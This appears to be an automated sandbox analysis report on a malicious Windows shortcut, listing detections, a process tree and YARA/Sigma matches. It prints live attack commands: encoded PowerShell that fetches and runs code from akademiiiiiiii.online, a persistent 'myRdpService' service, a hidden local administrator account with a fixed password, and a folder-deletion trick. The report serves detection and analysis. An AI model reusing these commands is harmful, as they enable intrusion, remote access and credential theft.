Edit tour

Windows Analysis Report
ny.lnk.d.lnk

Overview

General Information

Sample name:	ny.lnk.d.lnk
Analysis ID:	1578267
MD5:	6c28ee9da90d10710faecafc3bae173b
SHA1:	ad12270b640f388c27dcd071f163ea636ca4709c
SHA256:	e2e84b65af1fc49bdfa5d3c3a0793cf7632af91511aa8c16797770aabb5d6a99
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

Yara detected Powershell download and execute

Allows multiple concurrent remote connection

Bypasses PowerShell execution policy

Contains functionality to hide user accounts

Encrypted powershell cmdline option found

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Modifies security policies related information

PowerShell case anomaly found

Powershell drops PE file

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Reads the Security eventlog

Reads the System eventlog

Sigma detected: Invoke-Obfuscation STDIN+ Launcher

Sigma detected: PowerShell Base64 Encoded IEX Cmdlet

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious New Service Creation

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious PowerShell Invocations - Specific - PowerShell Module

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Uses known network protocols on non-standard ports

Uses regedit.exe to modify the Windows registry

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

PE file contains strange resources

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64native

cmd.exe (PID: 7336 cmdline: "C:\Windows\system32\cmd.exe" /c "STaRT /MiN "" POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA=="" && exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 4012 cmdline: POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA==" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 8052 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

WINWORD.EXE (PID: 4596 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Detailed information on policy benefits and commission levels for employees after probationary period Storytailors.docx" /o "" MD5: E7F3B8EA1B06F46176FC5C35307727D6)

cmd.exe (PID: 540 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 5520 cmdline: powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sppsvc.exe (PID: 8336 cmdline: C:\Windows\system32\sppsvc.exe MD5: 30C7EF47B57367CC546173BB4BB2BB04)

svczHost.exe (PID: 8876 cmdline: C:\Windows\Temp\svczHost.exe nonbo1 akademiiiiiiii.online 46d578f8ebeb0d298af9e0abba20aa6630bf759e378b0ee836f8ea55b25f08ca80e36c8f3c85f8f090ed84d188970ebb9376096bba1965529122fe3306bc0716 MD5: A2B92A4EB02A185E863F4F17737A0CA7)

conhost.exe (PID: 8884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 8948 cmdline: "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 8976 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 9032 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

powershell.exe (PID: 9052 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 9060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 8300 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 8272 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 2324 cmdline: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto & net start "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 1468 cmdline: sc delete "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 3012 cmdline: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

net.exe (PID: 1336 cmdline: net start "myRdpService" MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net1.exe (PID: 2888 cmdline: C:\Windows\system32\net1 start "myRdpService" MD5: BA0BCCC6029FBBE6D8B41197F252742F)

powershell.exe (PID: 4764 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA== MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

myRdpService.exe (PID: 4280 cmdline: C:\Windows\Temp\myRdpService.exe nonbo1 MD5: 5641F3A5B9787F23D3D34F0D9F791B7A)

regedit.exe (PID: 5020 cmdline: "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService" MD5: 999A30979F6195BF562068639FFC4426)

powershell.exe (PID: 1852 cmdline: "powershell.exe" -Command "systeminfo | Select-String \"OS Name\",\"OS Version\";" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

systeminfo.exe (PID: 5768 cmdline: "C:\Windows\system32\systeminfo.exe" MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 7708 cmdline: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7084 cmdline: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= MD5: 04029E121A0CFA5991749937DD22A1D9)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000023.00000002.25572623962.00007FF797186000.00000004.00000001.01000000.0000000A.sdmp	hacktool_windows_moyix_creddump	creddump is a python tool to extract credentials and secrets from Windows registry hives.	@mimeframe	0xdac4:$a1: !@#$%^&()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(@&% 0x11f94:$a2: 0123456789012345678901234567890123456789 0x3291c:$a3: NTPASSWORD 0x2f7b4:$a4: LMPASSWORD 0x5cd04:$a5: aad3b435b51404eeaad3b435b51404ee 0x14f54:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
Process Memory Space: powershell.exe PID: 4012	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2832b:$b1: ::WriteAllBytes( 0x240c3:$b2: ::FromBase64String( 0x29a13:$b2: ::FromBase64String( 0x1dc0e7:$b2: ::FromBase64String( 0x1df740:$b2: ::FromBase64String( 0x1dfde5:$b2: ::FromBase64String( 0x1dfe51:$b2: ::FromBase64String( 0x1dfeb5:$b2: ::FromBase64String( 0x1dff1e:$b2: ::FromBase64String( 0x1dff7e:$b2: ::FromBase64String( 0x1dfffe:$b2: ::FromBase64String( 0x1e007f:$b2: ::FromBase64String( 0x1e00ef:$b2: ::FromBase64String( 0x1e0152:$b2: ::FromBase64String( 0x1e01bb:$b2: ::FromBase64String( 0x1e0218:$b2: ::FromBase64String( 0x1e02a4:$b2: ::FromBase64String( 0x1e0309:$b2: ::FromBase64String( 0x1e0372:$b2: ::FromBase64String( 0x1e03d3:$b2: ::FromBase64String( 0x1e043a:$b2: ::FromBase64String(
Process Memory Space: powershell.exe PID: 5520	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 5520	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x173e3e:$b1: ::WriteAllBytes( 0x157111:$b2: ::FromBase64String( 0x157859:$b2: ::FromBase64String( 0x157af9:$b2: ::FromBase64String( 0x161be2:$b2: ::FromBase64String( 0x163d27:$b2: ::FromBase64String( 0x164b4c:$b2: ::FromBase64String( 0x164bb4:$b2: ::FromBase64String( 0x164c18:$b2: ::FromBase64String( 0x164c83:$b2: ::FromBase64String( 0x164ce0:$b2: ::FromBase64String( 0x164d7b:$b2: ::FromBase64String( 0x164ddd:$b2: ::FromBase64String( 0x164e4c:$b2: ::FromBase64String( 0x164eae:$b2: ::FromBase64String( 0x164f13:$b2: ::FromBase64String( 0x164f72:$b2: ::FromBase64String( 0x165007:$b2: ::FromBase64String( 0x165066:$b2: ::FromBase64String( 0x1650cf:$b2: ::FromBase64String( 0x165134:$b2: ::FromBase64String(
Process Memory Space: svczHost.exe PID: 8876	hacktool_windows_moyix_creddump	creddump is a python tool to extract credentials and secrets from Windows registry hives.	@mimeframe	0x165d:$a1: !@#$%^&()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(@&% 0x2db9:$a2: 0123456789012345678901234567890123456789 0xf77d:$a3: NTPASSWORD 0xe4b4:$a4: LMPASSWORD 0x20fa8:$a5: aad3b435b51404eeaad3b435b51404ee 0x3cb1:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
Process Memory Space: myRdpService.exe PID: 4280	hacktool_windows_moyix_creddump	creddump is a python tool to extract credentials and secrets from Windows registry hives.	@mimeframe	0x230c:$a1: !@#$%^&()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(@&% 0x3a68:$a2: 0123456789012345678901234567890123456789 0x1042c:$a3: NTPASSWORD 0x14085e:$a3: NTPASSWORD 0x140869:$a3: NTPASSWORD 0xf163:$a4: LMPASSWORD 0x140877:$a4: LMPASSWORD 0x140882:$a4: LMPASSWORD 0x21c57:$a5: aad3b435b51404eeaad3b435b51404ee 0x4960:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0 0x50f7d:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0 0x50fb9:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0 0x51007:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0 0x13ff23:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0 0x13ff5e:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0 0x13ff97:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0 0x13ffdd:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0 0x140010:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0 0x140041:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0 0x140086:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0 0x1400c2:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
35.2.myRdpService.exe.7ff796c80000.0.unpack	hacktool_windows_moyix_creddump	creddump is a python tool to extract credentials and secrets from Windows registry hives.	@mimeframe	0x511cc4:$a1: !@#$%^&()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(@&% 0x516194:$a2: 0123456789012345678901234567890123456789 0x536b1c:$a3: NTPASSWORD 0x5339b4:$a4: LMPASSWORD 0x560f04:$a5: aad3b435b51404eeaad3b435b51404ee 0x519154:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation STDIN+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA , CommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA , CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA==" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4012, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA , ProcessId: 540, ProcessName: cmd.exe

Sigma detected: PowerShell Base64 Encoded IEX Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /c "STaRT /MiN "" POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA=="" && exit, CommandLine: "C:\Windows\system32\cmd.exe" /c "STaRT /MiN "" POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA=="" && exit, 